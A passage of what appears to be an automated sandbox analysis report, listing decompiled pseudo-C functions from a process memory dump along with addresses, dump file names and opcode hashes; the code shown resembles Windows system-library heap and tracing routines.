						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L048F4620(0x49c6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x49c6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x0490bc36
0x0490bc42
0x0490bc45
0x0490bc4a
0x0490bd35
0x00000000
0x00000000
0x00000000
0x00000000
0x0490bc50
0x0490bc50
0x0490bc58
0x0490bc5a
0x0490bc60
0x00000000
0x00000000
0x0494a4f2
0x0494a4f6
0x00000000
0x00000000
0x00000000
0x0494a4fc
0x0490bc79
0x0490bc7e
0x0490bc86
0x0490bd16
0x0490bd20
0x0490bd20
0x0490bc8d
0x0490bc94
0x0490bcbd
0x0490bcca
0x0490bccb
0x0490bccc
0x0490bccd
0x0490bcce
0x0490bcd4
0x0490bcea
0x0490bcee
0x0490bcf2
0x0490bd00
0x0490bd04
0x00000000
0x0490bc96
0x0490bcab
0x0490bcaf
0x0490bd2c
0x0490bd2c
0x0490bd09
0x00000000
0x0490bd09
0x0490bcb1
0x0490bcb5
0x0490bcbb
0x00000000
0x00000000
0x00000000
0x0490bcbb

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47140513f57ea15388daf96857eeed8e9b7917169678d2fa5621a93257fca603
Instruction ID: 6d146188bd02b6ec395d3c89c331000db24d69d512636330282d14ded237de73
Opcode Fuzzy Hash: 47140513f57ea15388daf96857eeed8e9b7917169678d2fa5621a93257fca603
Instruction Fuzzy Hash: 9A3101726046159FDB11DF9CD480BAAB7A8FB18311F008479ED04EB281EB78FD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04901DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E04901DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E048FF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L048F4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E048FF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x04901dc2
0x04901dc5
0x04901dc7
0x04901dcc
0x04901dce
0x04901dd6
0x04901ddf
0x04901de0
0x04901de1
0x04901de5
0x04901de8
0x04901def
0x04901df0
0x04901df6
0x04901df7
0x04901dfe
0x04901e1a
0x00000000
0x00000000
0x04901e0b
0x04901e12
0x04901e12
0x04901e00
0x04901e00
0x04901e05
0x04901e1e
0x04901e23
0x0494570f
0x04945713
0x00000000
0x00000000
0x04945719
0x04945719
0x04901e2c
0x04901e2d
0x04901e2e
0x04901e2f
0x04901e31
0x04901e32
0x04901e35
0x04901e3d
0x04945723
0x0494573d
0x0494573d
0x00000000
0x04945723
0x04901e49
0x04901e4e
0x04901e4e
0x04901e09
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 63550b4cd0e5effcc4896b20ad6049206054a9b08861b7b0f5e25c4695ac9157
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: A8218032600218AFD721CF99CC85EAEBBBDEF85754F118465EA0197260DA35BE41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 048D9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E048D9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x49af6e8);
				E0492D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E049A88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0492D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x49c86c0; // 0x5107b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x49c86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E048F2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E049A88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0491AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x49cb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x49c84c0;
										if(_t69 >=  *0x49c84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E049A9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E048D922A(_t82);
							_t53 = E048F7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E049A8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x49c86c0; // 0x5107b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x49c86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x49c86bc;
										_t72 = 0x49c86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E048D9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x49c86c4;
									_t72 = 0x49c86c0;
									L18:
									E04909B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x048d9100
0x048d9100
0x048d9100
0x048d9100
0x048d9102
0x048d9107
0x048d910c
0x048d9110
0x048d9115
0x048d9136
0x048d9143
0x049337e4
0x049337e4
0x048d9149
0x048d914e
0x048d914e
0x048d9117
0x048d911d
0x00000000
0x00000000
0x048d911f
0x048d9125
0x00000000
0x048d9151
0x048d9158
0x048d915d
0x048d9161
0x048d9168
0x04933715
0x00000000
0x048d916e
0x048d916e
0x048d9175
0x048d9177
0x048d917e
0x048d917f
0x048d9182
0x048d9182
0x048d9187
0x048d9187
0x048d918a
0x048d918d
0x048d918f
0x048d9192
0x048d9195
0x048d9198
0x048d9198
0x048d9198
0x048d919a
0x00000000
0x00000000
0x0493371f
0x04933721
0x04933727
0x0493372f
0x04933733
0x04933735
0x04933738
0x0493373b
0x0493373d
0x04933740
0x00000000
0x00000000
0x04933746
0x04933749
0x00000000
0x00000000
0x0493374f
0x04933751
0x00000000
0x00000000
0x04933757
0x04933759
0x0493375c
0x0493375c
0x0493375e
0x0493375e
0x04933761
0x04933764
0x00000000
0x00000000
0x04933766
0x04933768
0x049337a3
0x049337a3
0x049337a5
0x049337a7
0x049337ad
0x049337b0
0x049337b2
0x049337bc
0x049337c2
0x049337c2
0x049337b2
0x048d9187
0x048d9187
0x048d918a
0x048d918d
0x048d918f
0x048d9192
0x048d9195
0x00000000
0x048d9195
0x00000000
0x048d9187
0x0493376a
0x0493376a
0x0493376c
0x0493376c
0x0493376f
0x04933775
0x00000000
0x00000000
0x04933777
0x04933779
0x00000000
0x00000000
0x04933782
0x04933787
0x04933789
0x04933790
0x04933790
0x0493378b
0x0493378b
0x0493378b
0x04933792
0x04933795
0x04933795
0x04933798
0x04933798
0x0493379b
0x0493379b
0x048d91a3
0x048d91a9
0x048d91b0
0x048d91b4
0x048d91b4
0x048d91bb
0x048d91c0
0x048d91c5
0x048d91c7
0x049337da
0x048d91cd
0x048d91cd
0x048d91cd
0x048d91d2
0x048d91d5
0x048d9239
0x048d9239
0x048d91d7
0x048d91db
0x048d91e1
0x048d91e7
0x048d91fd
0x048d9203
0x048d921e
0x048d9223
0x00000000
0x048d9223
0x048d9205
0x048d9208
0x048d920c
0x048d9214
0x048d9214
0x048d91e9
0x048d91e9
0x048d91ee
0x048d91f3
0x048d91f3
0x048d91f3
0x048d91e7
0x00000000
0x048d91db
0x048d9187
0x048d9168

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 065092b46e5fa5bb613c2d0131e0ee98a8712809c419e409dcaa87cc9095544b
Instruction ID: aaf2115e15e7627bcc6b7643a7438c32bb44b6a2c75cd158bc56669d495c2f77
Opcode Fuzzy Hash: 065092b46e5fa5bb613c2d0131e0ee98a8712809c419e409dcaa87cc9095544b
Instruction Fuzzy Hash: E631D6B1A02645DFEF25DF68C5487ACBBF5BB8D318F188B69C415A7241D338B980CB52

Uniqueness

Uniqueness Score: -1.00%

Function 048F0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E048F0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x49cd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04909ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0491B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E049A8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04909702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x49cb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x048f0055
0x048f005d
0x048f0062
0x048f006c
0x048f006f
0x048f0074
0x048f007a
0x048f007a
0x048f0080
0x048f0080
0x048f0087
0x048f008d
0x048f008f
0x048f0093
0x048f0095
0x048f009b
0x048f00f8
0x048f00fb
0x048f00fc
0x048f00ff
0x048f0108
0x048f0108
0x048f00a2
0x048f00a6
0x048f00b3
0x048f00bc
0x048f00c5
0x048f00ca
0x0493c01e
0x00000000
0x00000000
0x0493c02d
0x048f00d5
0x048f00d9
0x0493c03d
0x0493c046
0x0493c046
0x048f00df
0x048f00e2
0x048f00ea
0x048f00ef
0x048f00f2
0x048f00f6
0x048f0111
0x048f0117
0x048f0117
0x00000000
0x048f00f6
0x048f00d0
0x048f00d0
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f62e6733ae0b3a80a3569290ba7d35461743555ff3aee0b6047b9b42fb89928
Instruction ID: a7f137c7e8bcc9b68447708fa9ec21377a341b7b8f9a3003873e889796055055
Opcode Fuzzy Hash: 9f62e6733ae0b3a80a3569290ba7d35461743555ff3aee0b6047b9b42fb89928
Instruction Fuzzy Hash: 92319C31201A048FDB21DF28C844B56B3E5FF89718F144A79E996C7691EA35B801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04956C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04956C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E048F7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x49c7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L048F4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0491F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E048F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04919AE0();
						_t23 = L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x04956c0a
0x04956c0f
0x04956c10
0x04956c13
0x04956c15
0x04956c19
0x04956c1c
0x04956c21
0x04956c28
0x04956c3a
0x04956c2a
0x04956c33
0x04956c33
0x04956c3f
0x04956c48
0x04956c4d
0x04956c60
0x04956c65
0x04956c69
0x04956c73
0x04956c79
0x04956c7f
0x04956c86
0x04956c90
0x04956c94
0x04956ca6
0x04956cb2
0x04956cbd
0x04956cbd
0x04956cc3
0x04956cc7
0x04956ccb
0x04956cd0
0x04956cd1
0x04956ce2
0x04956ce2
0x04956c69
0x04956ced

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6298a5dfb221daa9dc3e4b2373f247a22ef62a32ac9e2428d21aa7af8641840
Instruction ID: 41c93601dd0a5537a56747216d21b5a02b967381f01ea40e267a909f0bfc47b9
Opcode Fuzzy Hash: d6298a5dfb221daa9dc3e4b2373f247a22ef62a32ac9e2428d21aa7af8641840
Instruction Fuzzy Hash: 8B219CB1A00644AFE715DF68D980F6AB7B8FF48744F14016AFA08D77A1D634ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 049190AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E049190AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0492D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0490E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L048F4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0491F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0490A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x049190af
0x049190b8
0x049190bb
0x049190bf
0x049190c2
0x049190c2
0x049190c8
0x049190cb
0x049190cd
0x049514d7
0x049514eb
0x049514eb
0x00000000
0x049514eb
0x049514db
0x049514e6
0x00000000
0x049514f2
0x049514e8
0x00000000
0x049514e8
0x049190d8
0x049190da
0x049190dd
0x049190e5
0x00000000
0x04919139
0x049190fa
0x049190fe
0x04919142
0x00000000
0x04919142
0x04919104
0x04919107
0x0491910b
0x04919110
0x04919118
0x04919147
0x04919148
0x0491914f
0x04919150
0x04919151
0x04919152
0x04919156
0x0491915d
0x04919160
0x04919168
0x0491916c
0x049191bc
0x049191be
0x00000000
0x049191be
0x0491916e
0x04919173
0x04919176
0x00000000
0x00000000
0x0491917c
0x04919180
0x049191b5
0x00000000
0x049191b5
0x04919182
0x04919185
0x04919189
0x00000000
0x00000000
0x0491918e
0x04919190
0x04919198
0x00000000
0x00000000
0x049191a0
0x00000000
0x049191ad
0x049191ad
0x049191b0
0x049191b1
0x00000000
0x04919185
0x0491911a
0x0491911c
0x0491911f
0x04919125
0x04919127
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: f99ffbe8af63ed8b772957e952cf568bf9f40313a290220b9b1e37b8dbc4e5de
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 042162B1A00208EFDB21DF59C944E6AF7F8EB54754F14887AE949A7260D370FD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04903B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04903B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x49c84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x49c84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L048F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x49c84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0491AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0491FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x49c84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x49c84c4; // 0x0
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04903b89
0x04903b96
0x04903ba1
0x04903bab
0x04903bb5
0x04903bb9
0x04946298
0x04903bbf
0x04903bc2
0x04903bc3
0x04903bc9
0x04903bca
0x04903bcc
0x04903bcd
0x04903bd4
0x04903bd6
0x04903bdb
0x04903bea
0x04903bf7
0x04903bfb
0x04903bff
0x04903c09
0x04903c0a
0x04903c0b
0x04903c0f
0x04903c14
0x04903c18
0x04903c18
0x04903bfb
0x04903c1b
0x04903c30
0x04903c30
0x04903c3d

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c37677bc4109850920d58bde03dbb855b1dd12b920c65258419add10b42cd8d
Instruction ID: 6e75d148f48c953c1ca99f59eddf227f7c319250880eea532ddeb28d0284da61
Opcode Fuzzy Hash: 8c37677bc4109850920d58bde03dbb855b1dd12b920c65258419add10b42cd8d
Instruction Fuzzy Hash: B121BE72A00118AFDB10DF58CD81B6ABBBDFB40708F150479E908EB251D375BD11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04956CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04956CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E048F7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E048F7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x48b5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0490F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0490F6E0(_t38, 0, _t46, _t56);
